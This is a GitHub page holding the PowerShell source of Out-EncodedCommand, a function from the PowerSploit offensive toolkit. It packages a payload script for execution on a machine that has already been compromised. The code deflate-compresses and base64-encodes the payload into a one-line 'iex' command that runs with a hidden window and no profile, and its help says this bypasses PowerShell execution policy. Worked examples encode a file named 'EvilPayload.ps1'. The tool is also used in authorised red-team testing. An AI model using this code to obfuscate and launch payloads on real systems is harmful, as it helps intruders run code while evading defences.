Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
185 lines (132 sloc) 7.61 KB
function Out-EncodedCommand
{
<#
.SYNOPSIS
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
PowerSploit Function: Out-EncodedCommand
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
.PARAMETER ScriptBlock
Specifies a scriptblock containing your payload.
.PARAMETER Path
Specifies the path to your payload.
.PARAMETER NoExit
Outputs the option to not exit after running startup commands.
.PARAMETER NoProfile
Outputs the option to not load the Windows PowerShell profile.
.PARAMETER NonInteractive
Outputs the option to not present an interactive prompt to the user.
.PARAMETER Wow64
Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
.PARAMETER WindowStyle
Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
.PARAMETER EncodedOutput
Base-64 encodes the entirety of the output. This is usually unnecessary and effectively doubles the size of the output. This option is only for those who are extra paranoid.
.EXAMPLE
C:\PS> Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
.EXAMPLE
C:\PS> Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
Description
-----------
Execute the above payload for the lulz. >D
.NOTES
This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
.LINK
http://www.exploit-monday.com
#>
[CmdletBinding( DefaultParameterSetName = 'FilePath')] Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )]
[ValidateNotNullOrEmpty()]
[ScriptBlock]
$ScriptBlock,
[Parameter(Position = 0, ParameterSetName = 'FilePath' )]
[ValidateNotNullOrEmpty()]
[String]
$Path,
[Switch]
$NoExit,
[Switch]
$NoProfile,
[Switch]
$NonInteractive,
[Switch]
$Wow64,
[ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')]
[String]
$WindowStyle,
[Switch]
$EncodedOutput
)
if ($PSBoundParameters['Path'])
{
Get-ChildItem $Path -ErrorAction Stop | Out-Null
$ScriptBytes = [IO.File]::ReadAllBytes((Resolve-Path $Path))
}
else
{
$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($ScriptBlock)
}
$CompressedStream = New-Object IO.MemoryStream
$DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
$DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
$DeflateStream.Dispose()
$CompressedScriptBytes = $CompressedStream.ToArray()
$CompressedStream.Dispose()
$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
# Generate the code that will decompress and execute the payload.
# This code is intentionally ugly to save space.
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + "'$EncodedCompressedScript'" + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
# Base-64 strings passed to -EncodedCommand must be unicode encoded.
$UnicodeEncoder = New-Object System.Text.UnicodeEncoding
$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
# Build the command line options
# Use the shortest possible command-line arguments to save space. Thanks @obscuresec for the idea.
$CommandlineOptions = New-Object String[](0)
if ($PSBoundParameters['NoExit'])
{ $CommandlineOptions += '-NoE' }
if ($PSBoundParameters['NoProfile'])
{ $CommandlineOptions += '-NoP' }
if ($PSBoundParameters['NonInteractive'])
{ $CommandlineOptions += '-NonI' }
if ($PSBoundParameters['WindowStyle'])
{ $CommandlineOptions += "-W $($PSBoundParameters['WindowStyle'])" }
$CmdMaxLength = 8190
# Build up the full command-line string. Default to outputting a fully base-64 encoded command.
# If the fully base-64 encoded output exceeds the cmd.exe character limit, fall back to partial
# base-64 encoding to save space. Thanks @Carlos_Perez for the idea.
if ($PSBoundParameters['Wow64'])
{
$CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
{
$CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
}
if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
{
$CommandLineOutput = "$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions -join ' ') -C `"$NewScript`""
}
}
else
{
$CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
if ($PSBoundParameters['EncodedOutput'] -or $CommandLineOutput.Length -le $CmdMaxLength)
{
$CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -E `"$EncodedPayloadScript`""
}
if (($CommandLineOutput.Length -gt $CmdMaxLength) -and (-not $PSBoundParameters['EncodedOutput']))
{
$CommandLineOutput = "powershell $($CommandlineOptions -join ' ') -C `"$NewScript`""
}
}
if ($CommandLineOutput.Length -gt $CmdMaxLength)
{
Write-Warning 'This command exceeds the cmd.exe maximum allowed length!'
}
Write-Output $CommandLineOutput
}